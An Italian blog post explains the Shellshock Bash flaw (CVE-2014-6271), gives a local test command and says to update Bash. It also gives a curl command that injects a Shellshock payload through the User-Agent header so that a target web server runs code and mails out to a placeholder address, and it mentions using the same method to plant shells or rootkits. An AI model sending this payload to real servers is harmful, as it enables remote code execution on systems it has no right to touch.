Se siete arrivati qua sapete già di cosa stiamo parlando. Come riportato da zeusnews.it ShellShock o CVE-2014-6271  è la falla riscontrata nelle versioni fino alla 4.3 di Bash, ovvero della maggior parte dei sistemi Unix (Mac, Linux, Android ecc…).

Per verificare se si è colpiti da questa vulnerabilità in locale è sufficiente digitare quanto segue nel terminale:

$ env x='() { :;}; echo vulnerabile' bash -c "echo prova"

Se la risposta è un errore… Tutto OK! Se invece nella risposta dovesse comparire il testo vulnerabile… Correte ai ripari!

Per sistemare la falla è necessario aggiornare la propria versione di bash. Su linux è sufficiente aggiornare il sistema mentre per Mac nel momento in cui scrivo non è ancora uscita una patch ufficiale ma potete procedere a vostro rischio e pericolo seguento questa guida.

Come sfruttare la falla ShellShock?

Se invece voleste testare se un determinato Web server è vulnerabile alla falla ShellShock dovreste semplicemente digitare quanto segue:

$ curl --user-agent '() { :; }; echo "Hello World!" | mail -s "Hello World" youremail@address.com' -v -I http://www.yourhost.com

Impostando lo user-agent come da esempio permetterete che il sistema target esegua il codice arbitrario che segue il secondo punto e virgola. Nel caso specifico invierete un’email al vostro indirizzo ma potreste tranquillamente eseguire un DDoS, scaricare dati o, peggio, caricare una shell o un rootkit. Altri dettagli a questo indirizzo.

Nb. Chiaramente vi sconsiglio vivamente di utilizzare il codice sopra su un server che non vi appartenga, verrete immediatamente loggati e probabilmente segnalati alla polizia postale…

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *